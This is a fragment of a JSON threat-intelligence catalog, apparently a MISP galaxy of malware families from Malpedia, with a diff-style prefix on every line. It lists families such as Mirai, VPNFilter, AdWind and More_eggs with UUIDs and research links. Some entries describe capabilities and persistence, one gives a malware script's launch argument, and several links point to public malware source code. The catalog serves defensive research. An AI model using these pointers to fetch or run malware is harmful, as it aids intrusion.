- "https://research.checkpoint.com/new-iot-botnet-storm-coming/",
- "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/",
- "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm",
- "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/"
- ]
- },
- "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2",
- "value": "IoT Reaper",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx",
- "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/"
- ]
- },
- "uuid": "6a4365fc-8448-4270-ba93-0341788d004b",
- "value": "JenX",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "STD"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten",
- "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf"
- ]
- },
- "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12",
- "value": "Kaiten",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady",
- "https://news.drweb.com/news/?i=10140&lng=en"
- ]
- },
- "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d",
- "value": "Lady",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey",
- "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger"
- ]
- },
- "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea",
- "value": "MiKey",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai",
- "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
- "http://osint.bambenekconsulting.com/feeds/",
- "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
- "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
- "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
- "https://isc.sans.edu/diary/22786",
- "https://github.com/jgamblin/Mirai-Source-Code",
- "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
- ]
- },
- "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c",
- "value": "Mirai",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes",
- "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
- ]
- },
- "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
- "value": "Mokes",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose",
- "http://www.welivesecurity.com/2015/05/26/moose-router-worm/",
- "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/",
- "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/"
- ]
- },
- "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0",
- "value": "Moose",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack",
- "https://news.drweb.com/?i=5760&c=23&lng=en"
- ]
- },
- "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50",
- "value": "MrBlack",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari",
- "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/",
- "https://twitter.com/ankit_anubhav/status/1019647993547550720",
- "https://twitter.com/360Netlab/status/1019759516789821441",
- "https://twitter.com/hrbrmstr/status/1019922651203227653",
- "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863",
- "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html",
- "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/"
- ]
- },
- "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488",
- "value": "Owari",
- "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla",
- "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf",
- "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf",
- "https://twitter.com/juanandres_gs/status/944741575837528064"
- ]
- },
- "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840",
- "value": "Penquin Turla",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/"
- ]
- },
- "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7",
- "value": "Persirai",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2",
- "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/"
- ]
- },
- "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d",
- "value": "r2r2",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos",
- "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
- ]
- },
- "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5",
- "value": "Rakos",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex",
- "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/",
- "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/"
- ]
- },
- "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b",
- "value": "Rex",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori",
- "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/",
- "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori",
- "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
- "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
- "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
- "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/"
- ]
- },
- "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0",
- "value": "Satori",
- "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry"
- ]
- },
- "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7",
- "value": "ShellBind",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga",
- "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/"
- ]
- },
- "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5",
- "value": "Shishiga",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte",
- "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/"
- ]
- },
- "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0",
- "value": "Spamtorte",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor",
- "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html"
- ]
- },
- "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c",
- "value": "SSHDoor",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko",
- "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/"
- ]
- },
- "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98",
- "value": "Stantinko",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii",
- "https://blog.avast.com/new-torii-botnet-threat-research"
- ]
- },
- "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92",
- "value": "Torii",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot",
- "http://paper.seebug.org/345/"
- ]
- },
- "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883",
- "value": "Trump Bot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Amnesia",
- "Radiation"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami",
- "https://www.8ackprotect.com/blog/big_brother_is_attacking_you",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
- "http://get.cyberx-labs.com/radiation-report"
- ]
- },
- "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac",
- "value": "Tsunami",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat"
- ]
- },
- "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0",
- "value": "Turla RAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Espeon"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/",
- "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html"
- ]
- },
- "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460",
- "value": "Umbreon",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter",
- "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
- "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html",
- "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities",
- "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
- "https://blog.talosintelligence.com/2018/05/VPNFilter.html",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en",
- "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware"
- ]
- },
- "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500",
- "value": "elf.vpnfilter",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess"
- ]
- },
- "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
- "value": "elf.wellmess",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
- "https://news.drweb.com/show/?i=2679&lng=en&c=14"
- ]
- },
- "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e",
- "value": "Wirenet",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "splm",
- "chopstick",
- "fysbis"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
- "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
- "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
- ]
- },
- "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
- "value": "X-Agent",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc",
- "https://twitter.com/michalmalik/status/846368624147353601"
- ]
- },
- "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2",
- "value": "Xaynnalc",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos",
- "https://en.wikipedia.org/wiki/Xor_DDoS",
- "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf",
- "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html"
- ]
- },
- "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4",
- "value": "XOR DDoS",
- "description": "Linux DDoS C&C Malware"
- },
- {
- "meta": {
- "synonyms": [
- "darlloz"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard",
- "https://blogs.cisco.com/security/the-internet-of-everything-including-malware"
- ]
- },
- "uuid": "9218630d-0425-4b18-802c-447a9322990d",
- "value": "Zollard",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy",
- "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
- ]
- },
- "uuid": "8269e779-db23-4c94-aafb-36ee94879417",
- "value": "DualToy",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject",
- "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/"
- ]
- },
- "uuid": "d9215579-eee0-4e50-9157-dba7c3214769",
- "value": "GuiInject",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
- ]
- },
- "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5",
- "value": "WireLurker",
- "description": "The iOS malware that is installed over USB by osx.wirelurker"
- },
- {
- "meta": {
- "synonyms": [
- "AlienSpy",
- "JSocket",
- "Frutas",
- "UNRECOM",
- "JBifrost",
- "Sockrat"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind",
- "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat",
- "http://malware-traffic-analysis.net/2017/07/04/index.html",
- "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/",
- "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885",
- "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html"
- ]
- },
- "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c",
- "value": "AdWind",
- "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware"
- },
- {
- "meta": {
- "synonyms": [
- "Trupto"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat",
- "https://objective-see.com/blog/blog_0x28.html",
- "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"
- ]
- },
- "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84",
- "value": "CrossRAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Jacksbot"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat",
- "https://github.com/java-rat",
- "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/"
- ]
- },
- "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376",
- "value": "jRAT",
- "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io."
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", - "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" - ] - }, - "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", - "value": "jSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", - "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", - "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" - ] - }, - "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", - "value": "Qarallax RAT", - "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." - }, - { - "meta": { - "synonyms": [ - "Quaverse RAT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", - "https://www.digitrustgroup.com/java-rat-qrat/", - "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" - ] - }, - "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", - "value": "QRat", - "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", - "https://github.com/shotskeber/Ratty" - ] - }, - "uuid": "da032a95-b02a-4af2-b563-69f686653af4", - "value": "Ratty", - "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", - "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" - ] - }, - "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", - "value": "AIRBREAK", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", - "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" - ] - }, - "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", - "value": "Bateleur", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", - "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", - "https://twitter.com/JohnLaTwC/status/983011262731714565" - ] - }, - "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", - "value": "CryptoNight", - "description": "WebAssembly-based crpyto miner." 
- }, - { - "meta": { - "synonyms": [ - "Roblox Trade Assist" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", - "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" - ] - }, - "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", - "value": "CukieGrab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", - "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", - "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" - ] - }, - "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", - "value": "KopiLuwak", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", - "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" - ] - }, - "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", - "value": "magecart", - "description": "" - }, - { - "meta": { - "synonyms": [ - "SpicyOmelette" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", - "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", - "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", - "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", - "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", - "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", - "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", - "https://blog.morphisec.com/cobalt-gang-2.0" - ] - }, - "uuid": 
"1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", - "value": "More_eggs", - "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", - "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" - ] - }, - "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", - "value": "Powmet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", - "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", - "http://resources.infosecinstitute.com/scanbox-framework/" - ] - }, - "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", - "value": "scanbox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", - "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" - ] - }, - "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", - "value": "HTML5 Encoding", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", - "https://twitter.com/JohnLaTwC/status/915590893155098629" - ] - }, - "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", - "value": "Maintools.js", - "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", - "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef", - "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f" - ] - }, - "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" - ] - }, - "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", - "value": "witchcoven", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", - "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/", - "https://github.com/kai5263499/Bella", - "https://github.com/kai5263499/Bella" - ] - }, - "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", - "value": "Bella", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Mask", - "Appetite" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] - }, - "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", - "value": "Careto", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] - }, - "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", - "value": "CoinThief", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", - "https://objective-see.com/blog/blog_0x2A.html" - ] - }, - "uuid": 
"076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", - "value": "Coldroot RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", - "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" - ] - }, - "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", - "value": "CpuMeaner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", - "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", - "https://digitasecurity.com/blog/2018/02/05/creativeupdater/", - "https://objective-see.com/blog/blog_0x29.html" - ] - }, - "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", - "value": "CreativeUpdater", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", - 